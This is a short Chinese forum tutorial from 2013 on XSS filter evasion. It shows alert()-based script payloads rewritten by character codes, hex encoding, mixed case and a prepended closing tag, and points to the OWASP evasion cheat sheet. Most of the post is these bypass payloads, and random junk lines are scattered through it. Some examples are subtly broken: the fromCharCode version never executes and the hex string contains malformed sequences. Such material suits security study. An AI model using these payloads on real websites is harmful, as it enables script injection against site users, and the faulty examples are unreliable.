中国网络渗透测试联盟
标题:
XSS 绕过技术
[打印本页]
作者:
admin
时间:
2013-2-14 00:10
标题:
XSS 绕过技术
四种超级基础的绕过方法。
$ g8 M" N3 J% I5 k- y. E, A
1.转换为ASCII码
/ Y# l2 J% d. N6 h$ o# @! l
例子:原脚本为<script>alert(‘I love F4ck’)</script >
1 W' p( p9 Y/ y+ S4 U6 |
通过转换,变成:
% b6 w* u+ U$ A7 d# D% z5 q/ Z' d
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
5 Q6 O! T' A- `$ u
& P- i3 |; }8 i
2.转换为HEX(十六进制)
4 Y3 H" a$ b9 z6 T
例子:原脚本为<script>alert(‘I love F4ck’)</script>
; ~, ~( S* a9 X) [: x! p7 [
通过转换,变成:
5 }6 o. [! |* L, ]
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
+ v$ z1 E I- l# f& d) x
& K+ t( D; W( q* [
3.转换脚本的大小写
0 G5 G) G6 l/ _/ t: V8 Q h
例子:原脚本为<script>alert(‘I love F4ck’)</script>
' M( y" F0 Z8 r( F' x- v
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
' r: K2 I% w; e5 _) p% Z0 d( g- _) G
! D( s) v3 T* b
4.增加闭合标记”>
0 _* k3 D$ D: v7 B" b
例子:原脚本为<script>alert(‘I love F4ck’)</script>
- ?; p' V2 g2 p( K8 Z- _
转换为:”><script>alert(‘I love F4ck’)</script>
- c0 P7 R$ h# ~. q
更详细绕过技术请参考此网页
& R1 a4 }" W8 k9 P" C) {
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
! d1 ]1 \2 z( e1 S
- B! a+ q1 q3 d+ G: y- r
转换工具使用的是火狐的 hackbar mozilla addon.
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2